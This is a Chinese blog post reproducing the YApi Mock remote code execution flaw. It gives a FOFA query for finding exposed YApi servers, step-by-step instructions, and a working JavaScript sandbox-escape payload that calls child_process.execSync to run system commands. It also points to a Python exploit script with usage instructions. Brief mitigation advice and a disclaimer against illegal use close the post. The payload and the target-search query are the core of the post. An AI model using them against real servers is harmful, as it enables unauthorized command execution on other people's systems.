最新文章:
- 我国互联网持续遭攻击,主要来自美国!
- 黑客组织Killnet宣布已摧毁攻击俄罗斯互联网的匿名者黑客组织的网站
- 英伟达回应攻击 确实有数据被盗但影响不大
- 外媒:黑客组织“匿名者”攻击了俄罗斯三个网站
- Termux打造Android手机渗透神器
首页 漏洞复现
YApi Mock 远程代码执行漏洞复现
发布时间:2021年07月09日 评论数:抢沙发 阅读数:7112
本文参考 github 安全鸭
github的漏洞详情
https://github.com/YMFE/yapi/issues/2233#
近日,网络上爆出 YApi 的远程代码执行 0day 漏洞 正被广泛利用。攻击者通过注册用户后,即可通过 Mock 功能远程执行任意代码。
漏洞描述:
YAPI接口管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。YApi是高校、易用、功能强大的api管理平台。但因为大量用户使用YAPI的默认配置并允许从外部网络访问YAPI服务,导致攻击者注册用户后,即可通过Mock功能远程执行任意代码。
fofa语法
app="YApi"
漏洞复现过程:
首先注册一个用户
接着新建一个项目
接着返回项目首页新建一个接口~~~~~~~~
写入exp!!!!!
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami").toString()



详情参考github地址
https://github.com/YMFE/yapi/issues/2233#
一个不愿意透露姓名的好心人提供好了 python3脚本
使用方法 python3 exp.py -u url -e whomi
脚本稍微有点问题 凑合用吧
修复建议
临时修复建议
1.关闭YAPi用户注册功能,以阻断攻击者注册。
2.利用请求白名单的方式限制YAPi相关端口。
3.排查YAPi服务器是否存在恶意访问记录。
切勿非法用途,履行白帽职责。
本文地址:https://www.hackexp.cn/?post=66
版权声明:若无注明,本文皆为“h4ck1r's Blog”原创,转载请保留文章出处。